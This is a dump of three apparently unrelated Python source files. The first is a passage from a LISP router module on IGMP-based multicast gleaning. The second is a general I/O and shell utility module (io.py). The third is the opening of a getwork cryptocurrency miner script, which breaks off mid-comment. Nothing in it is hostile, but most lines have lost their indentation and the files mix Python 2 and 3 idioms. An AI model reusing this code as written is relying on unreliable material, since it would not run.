e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"])
#endfor
return(False, False)
#enddef
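#
# Illustrative sketch (never called): building one lisp_glean_mappings entry
# with the keys the function above tests. The prefixes and instance-ID range
# are invented; lisp_address() usage mirrors the rest of this file.
#
def lisp_example_glean_mapping():
    entry = {}
    entry["instance-id"] = (1000, 1000)
    entry["eid-prefix"] = lisp_address(LISP_AFI_IPV4, "10.0.0.0", 8, 1000)
    entry["rloc-prefix"] = lisp_address(LISP_AFI_IPV4, "192.168.0.0", 16, 0)
    entry["rloc-probe"] = True
    return(entry)
#enddef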
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port):
e = green("(*, {})".format(geid.print_address()), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
seid_name = seid.print_address_no_iid()
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} for gleaned EID {}".format(r, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} for gleaned EID {}".format(r, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid, rloc, port):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
if (mc.rloc_set == []): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
e = green("(*, {})".format(geid.print_address()), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
lprint("Gleaned EID {} RLE {} removed".format(e, r))
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} removed, no more RLEs".format(e, r))
#endif
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically the even report types (0x12, 0x16, 0x22) are Joins and the odd
# type 0x17 is a Leave.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
r = bold("Receive", False)
lprint("{} {}-byte IGMP packet: {}".format(r, len(packet),
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22). For IGMPv3, the second
# 32-bit word parsed above carries the group-record count, so group.address
# currently holds it.
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return(register_entries)
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. ALLOW_NEW_SOURCES (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type == 4 and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records).
#
for j in range(source_count):
if (len(igmp) < source_size): return(register_entries)
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to the caller so it can send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
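#
# The returned register_entries is a list of [source, group, joinleave]
# triples, e.g. (addresses invented): [None, "224.1.1.1", True] for a (*,G)
# join and ["10.1.1.1", "224.2.2.2", False] for an (S,G) leave. Callers like
# lisp_glean_map_cache() unpack the triples directly.
#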
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
#
# Change RLOC for each gleaned group this EID has joined.
#
for group in mc.gleaned_groups:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port)
#endfor
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Add RLOC to a new map-cache entry or update the RLOC for an existing entry.
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group?
#
lisp_geid.store_address(group)
allow, nil = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port)
if (group in mc.gleaned_groups): continue
mc.gleaned_groups.append(group)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid, rloc, encap_port)
if (group in mc.gleaned_groups): mc.gleaned_groups.remove(group)
#endif
#endfor
#enddef
#------------------------------------------------------------------------------
|
io.py | import pickle
import codecs
import contextlib
from contextlib import contextmanager
import gzip
import json
import os
import random
import shutil
import subprocess
import sys
import time
from queue import Queue, Empty
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
from collections.abc import Mapping  # Mapping lives in collections.abc on Python 3
from os.path import join
from threading import Thread
import jsonpickle
import numpy as np
from fabric.api import local, settings
from fabric.context_managers import hide
from gtd.utils import truncated
class MultiStream(object):
def __init__(self, *streams):
self.streams = streams
def write(self, msg):
for s in self.streams:
s.write(msg)
s.flush()
def flush(self):
for s in self.streams:
s.flush()
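# Usage sketch (illustrative): tee every write to both stderr and a log file.
#
#   with open('run.log', 'a') as log:
#       MultiStream(sys.stderr, log).write('hello\n')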
class redirect_stream(object):
"""Inside this context manager, inputs to a target stream are redirected to a replacement stream instead."""
def __init__(self, replacement):
"""Redirect.
Args:
replacement: replace the target stream with this stream.
"""
self._replacement = replacement
@property
def target_stream(self):
"""Get the target stream."""
raise NotImplementedError
@target_stream.setter
def target_stream(self, s):
"""Set the target stream."""
raise NotImplementedError
def __enter__(self):
self._original = self.target_stream # save the original stream
self.target_stream = self._replacement
def __exit__(self, exc_type, exc_value, traceback):
self._replacement.flush()
self.target_stream = self._original # put the original stream back
class redirect_stdout(redirect_stream):
@property
def target_stream(self):
return sys.stdout
@target_stream.setter
def target_stream(self, s):
sys.stdout = s
class redirect_stderr(redirect_stream):
@property
def target_stream(self):
return sys.stderr
@target_stream.setter
def target_stream(self, s):
sys.stderr = s
class save_stdout(object):
def __init__(self, save_dir):
makedirs(save_dir)
save_file = lambda filename: open(join(save_dir, filename), 'a')
self._f_out = save_file('stdout.txt')
self._f_err = save_file('stderr.txt')
self._redirects = [redirect_stdout(MultiStream(self._f_out, sys.stdout)),
redirect_stderr(MultiStream(self._f_err, sys.stderr))]
def __enter__(self):
for r in self._redirects:
r.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
for r in self._redirects:
r.__exit__(exc_type, exc_val, exc_tb)
self._f_out.close()
self._f_err.close()
def utfopen(path, mode):
"""Open a file with UTF-8 encoding."""
return codecs.open(path, mode, encoding='utf-8')
def save(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f)
def load(path):
with open(path, 'rb') as f:
return pickle.load(f)
def work_in_sandbox(directory):
"""Create a sandbox directory, and set cwd to sandbox.
Deletes any existing sandbox directory!
Args:
directory: directory in which to put sandbox directory
"""
os.chdir(directory)
p = 'sandbox'
if os.path.exists(p): # remove if already exists
shutil.rmtree(p)
os.makedirs(p)
os.chdir(p)
print(os.getcwd())
def makedirs(directory):
"""If directory does not exist, make it.
Args:
directory (str): a path to a directory. Cannot be the empty path.
"""
if directory != '' and not os.path.exists(directory):
os.makedirs(directory)
def reset_state():
# Reset all random seeds, as well as TensorFlow default graph
random.seed(0)
np.random.seed(0)
import tensorflow as tf
from tensorflow.python.framework import ops
tf.set_random_seed(0)
ops.reset_default_graph()
class EmptyFile(object):
"""Delivers a never-ending stream of empty strings."""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __iter__(self):
return self
def __next__(self):
return ''
def read_files(*file_paths):
files = []
for i, p in enumerate(file_paths):
if p:
files.append(open(p, mode="r"))
print('Opened:', p)
else:
files.append(EmptyFile())
print('WARNING: no path provided for file {} in list.'.format(i))
# contextlib.nested() was removed in Python 3; ExitStack is the equivalent
# for entering a variable number of context managers.
with contextlib.ExitStack() as stack:
    entered_files = [stack.enter_context(f) for f in files]
    for lines in zip(*entered_files):
        yield lines
class MultiFileWriter(object):
def __init__(self, *file_paths):
self.file_paths = file_paths
def __enter__(self):
self.files = [open(fp, 'w') for fp in self.file_paths]
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for file in self.files:
file.__exit__(exc_type, exc_val, exc_tb)
def write(self, lines):
assert len(lines) == len(self.files)
for f, line in zip(self.files, lines):
f.write(line)
def open_or_create(path, *args, **kwargs):
"""Open a file or create it, if it does not exist.
Args:
path (str): path to file
gz (bool): whether to use GZIP or not. Defaults to False.
Returns:
file object
"""
gz = kwargs.pop('gz', False)
open_file = gzip.open if gz else open
if not os.path.isfile(path):
with open_file(path, 'w'):
pass # create file
return open_file(path, *args, **kwargs)
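# Usage sketch (filename invented): create 'data.json.gz' if it is missing,
# then open it for reading as gzip text.
#
#   with open_or_create('data.json.gz', 'rt', gz=True) as f:
#       text = f.read()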
class Process(object):
def __init__(self, cmd, cwd=None):
# universal_newlines=True makes stdout yield str, so the '' sentinel used
# in read() below terminates correctly on Python 3.
self._proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                              shell=True, cwd=cwd, universal_newlines=True)
def read(self, timeout=float('inf')):
def enqueue_output(out, queue):
for c in iter(lambda: out.read(1), ''):
queue.put(c)
q = Queue()
t = Thread(target=enqueue_output, args=(self._proc.stdout, q))
t.daemon = True # thread dies with the program
t.start()
last_yield_time = time.time()
while True:
try:
yield q.get(timeout=0.001)
last_yield_time = time.time()
except Empty:
# if 1 millisecond passes without new item on queue...
if not self.alive:
# break if process has died
break
if time.time() - last_yield_time > timeout:
# break if time is up
break
def read_lines(self, timeout=float('inf')):
chars = []
for c in self.read(timeout):
chars.append(c)
if c == '\n':
yield ''.join(chars[:-1])
chars = []
@property
def pid(self):
return self._proc.pid
@property
def alive(self):
code = self._proc.poll()
return code is None
def terminate(self):
return self._proc.terminate()
def wait(self):
return self._proc.wait()
def shell(cmd, cwd=None, verbose=False, debug=False):
"""Execute a command just like you would at the command line.
Attempts to print output from the command with as little buffering as possible.
http://stackoverflow.com/questions/18421757/live-output-from-subprocess-command
Args:
cmd (str): command to execute, just as you would enter at the command line
cwd (str): current working directory to execute the command
verbose (bool): whether to print out the results of the command
debug (bool): if True, command is not actually executed. Typically used with verbose=True.
Returns:
all output from the command
"""
if verbose:
print(cmd)
if debug:
return
output = []
process = Process(cmd, cwd)
for c in process.read():
output.append(c)
if verbose:
sys.stdout.write(c)
sys.stdout.flush()
status = process.wait()
if status != 0:
raise RuntimeError('Error, exit code: {}'.format(status))
# TODO: make sure we get all output
return ''.join(output)
def local_bash(command, capture=False):
"""Just like fabric.api.local, but with shell='/bin/bash'."""
return local(command, capture, shell='/bin/bash')
class JSONPicklable(object, metaclass=ABCMeta):
"""Uses jsonpickle to convert any picklable object to and from JSON."""
@abstractmethod
def __getstate__(self):
"""Return a variable with enough information to reconstruct the object."""
pass
@abstractmethod
def __setstate__(self, state):
"""Use the variable from __getstate__ to restore the object.
Note that pickle created this object without calling __init__.
So, a common strategy is to manually call self.__init__(...) inside this function, using the information
provided by `state`.
"""
pass
def to_json_str(self):
return jsonpickle.encode(self)
@classmethod
def from_json_str(cls, s):
return jsonpickle.decode(s)
def to_json(self):
"""Use jsonpickle to convert this object to JSON."""
s = self.to_json_str()
d = json.loads(s) # convert str to dict
return d
@classmethod
def from_json(cls, d):
"""Use jsonpickle to convert JSON into an object."""
s = json.dumps(d)
obj = cls.from_json_str(s)
return obj
def to_file(self, path):
with open(path, 'w') as f:
json.dump(self.to_json(), f)
@classmethod
def from_file(cls, path):
    with open(path, 'r') as f:
        d = json.load(f)
    return cls.from_json(d)
class InitPicklable(object):
def __new__(cls, *args, **kwargs):
obj = super(InitPicklable, cls).__new__(cls)
obj.__initargs = args, kwargs
return obj
def __getstate__(self):
return self.__initargs
def __setstate__(self, state):
args, kwargs = state
self.__init__(*args, **kwargs)
def sub_dirs(root_dir):
"""Return a list of all sub-directory paths.
Example:
>> root_dir = '/Users/Kelvin/data'
>> sub_dirs(root_dir)
['/Users/Kelvin/data/a', '/Users/Kelvin/data/b']
"""
dir_paths = []
for path in os.listdir(root_dir):
full_path = join(root_dir, path)
if os.path.isdir(full_path):
dir_paths.append(full_path)
return dir_paths
class IntegerDirectories(Mapping):
"""Keep track of directories with names of the form "{integer}_{something}" or just "{integer}"."""
def __init__(self, root_dir):
self.root_dir = root_dir
makedirs(root_dir)
@property
def _ints_to_paths(self):
ints_to_paths = {}
for p in sub_dirs(self.root_dir):
name = os.path.basename(p)
try:
i = int(name.split('_')[0])
if i in ints_to_paths:
raise IOError("Multiple directories with the same integer prefix: {} and {}".format(
ints_to_paths[i], p))
ints_to_paths[i] = p
except ValueError:
# the first element was not an integer
pass
# put into an ordered dict
ordered = OrderedDict()
for i in sorted(ints_to_paths):
ordered[i] = ints_to_paths[i]
return ordered
def __len__(self):
return len(self._ints_to_paths)
@property
def largest_int(self):
"""Largest int among the integer directories."""
if len(self._ints_to_paths) == 0:
return None
return max(self._ints_to_paths)
def new_dir(self, name=None):
"""Create a new directory and return its path."""
if self.largest_int is None:
idx = 0
else:
idx = self.largest_int + 1
path = join(self.root_dir, str(idx))
if name:
path = '{}_{}'.format(path, name) # add name as suffix
makedirs(path)
return path
def __getitem__(self, i):
"""Get the path to directory i.
Raises:
KeyError, if directory does not exist.
"""
if i not in self._ints_to_paths:
raise KeyError("Directory #{} not found".format(i))
return self._ints_to_paths[i]
def __iter__(self):
return iter(self._ints_to_paths)
def rsync(src_path, dest_path, src_host=None, dest_host=None, delete=False):
"""Sync a file/directory from one machine to another machine.
Args:
src_path (str): a file or directory on the source machine.
dest_path (str): the corresponding file or directory on the target machine.
src_host (str): the address of the source machine. Default is local machine.
dest_host (str): the address of the target machine. Default is local machine.
delete (bool): default is False. If True, deletes any extraneous files at the destination not
present at the source!
Options used:
-r: recurse into directories
-l: copy symlinks as symlinks
-v: verbose
-z: compress files during transfer
-t: preserve times (needed for rsync to recognize that files haven't changed since last update!)
--delete: delete any extraneous files at the destination
--progress: show progress
"""
if os.path.isdir(src_path):
if src_path[-1] != '/':
src_path += '/' # add missing trailing slash
def format_address(host, path):
if host is None:
return path
else:
return '{}:{}'.format(host, path)
cmds = ["rsync", "-rlvzt", "--progress"]
if delete:
cmds.append('--delete')
cmds.append(format_address(src_host, src_path))
cmds.append(format_address(dest_host, dest_path))
cmd = ' '.join(cmds)
local(cmd)
def num_lines(file_path):
"""Count the number of lines in a file.
Uses the `wc` command line tool.
Args:
file_path (str)
Returns:
int
"""
return int(local('wc -l {}'.format(file_path), capture=True).split()[0])
class Tmux(object):
def __init__(self, name, cwd=None):
"""Create a tmux session.
Args:
name (str): name of the new session
cwd (str): initial directory of the session
Options used:
-d: do not attach to the new session
-s: specify a name for the session
"""
self.name = name
with settings(hide('warnings'), warn_only=True):
result = local("tmux new -d -s {}".format(name)) # start tmux session
if result.failed:
raise TmuxSessionExists()
if cwd is None:
cwd = os.getcwd()
# move to current directory
self.run("cd {}".format(cwd))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def run(self, command):
"""Run command in tmux session.
Assume that the session has only one window.
Args:
command (str)
"""
local('tmux send -t {} "{}" Enter'.format(self.name, command))
def close(self):
local("tmux kill-session -t {}".format(self.name))
class TmuxSessionExists(Exception):
pass
def tunnel(local_port, host, target, target_port, tmux_name, autossh_port=20000):
"""Make a port on a target machine appear as if it is a port on our local machine.
Uses autossh to keep the tunnel open even with interruptions.
Runs autossh in a new tmux session, so that it can be monitored.
Args:
local_port (int): a port on this machine, e.g. 18888
host (str): the machine that will be used to create the SSH tunnel, e.g. `kgu@jamie.stanford.edu` or just `jamie`
if we have that alias configured in ~/.ssh/config.
target (str): the address of the target machine, e.g. `kgu@john11.stanford.edu` or just `john11`. The address
should be RELATIVE to the host machine.
target_port (int): port on the target machine, e.g. 8888
tmux_name (str): name of the tmux session that will be running the autossh command.
autossh_port (int): local port used by autossh to monitor the connection. Cannot be used by more than one
autossh process at a time!
"""
command = "autossh -M {} -N -n -T -L {}:{}:{} {}".format(autossh_port, local_port, target, target_port, host)
tmux = Tmux(tmux_name)
tmux.run(command)
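# Usage sketch (hosts, ports, and session name invented): make port 8888 on
# john11 reachable at localhost:18888, tunneled through jamie and kept alive
# by autossh running inside tmux session 'nb-tunnel'.
#
#   tunnel(18888, 'jamie', 'john11', 8888, 'nb-tunnel')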
class Workspace(object):
"""Manage paths underneath a top-level root directory.
Paths are registered with this Workspace. An IOError is thrown if the path has already been registered before.
"""
def __init__(self, root):
"""Create a Workspace.
Args:
root (str): absolute path of the top-level directory.
"""
self._root = root
makedirs(root)
self._paths = set()
@property
def root(self):
return self._root
def _add(self, name, relative_path):
"""Register a path.
Args:
name (str): short name to reference the path
relative_path (str): a relative path, relative to the workspace root.
Returns:
self
"""
full_path = join(self._root, relative_path)
if hasattr(self, name):
raise IOError('Name already registered: {}'.format(name))
if full_path in self._paths:
    raise IOError('Path already registered: {}'.format(relative_path))
self._paths.add(full_path)  # record it so later duplicates are detected
setattr(self, name, full_path)
def add_dir(self, name, relative_path=None):
"""Register a directory.
If no relative path is specified, it is assumed that the name
is the relative path.
Args:
name (str)
relative_path (str)
"""
if relative_path is None:
relative_path = name
self._add(name, relative_path)
makedirs(getattr(self, name))
def add_file(self, name, relative_path):
self._add(name, relative_path)
def split_path(path):
"""Break a file path into its components.
Args:
path (str): e.g. '/Users/Joe/Documents/file.txt'
Returns:
elements (list[str]): e.g. ['Users', 'Joe', 'Documents', 'file.txt']
"""
elements = []
dir_name = path
while True:
dir_name, leaf = os.path.split(dir_name)
if leaf:
elements.append(leaf)
else:
break
return list(reversed(elements))
@contextmanager
def lines_in_file(path, limit=float('inf'), desc=None, compute_total=True):
from gtd.chrono import verboserate
if compute_total:
total = min(num_lines(path), limit) # compute total lines in file
else:
total = None
with codecs.open(path, 'r', encoding='utf-8') as lines:
if desc:
lines = verboserate(lines, desc=desc, total=total)
if limit:
lines = truncated(lines, limit)
yield lines |
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Cornellieis developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class CornellieisRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
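# Worked example (Python 2 byte strings, illustrative): bufreverse swaps the
# bytes within each 32-bit word and wordreverse reverses the word order:
#
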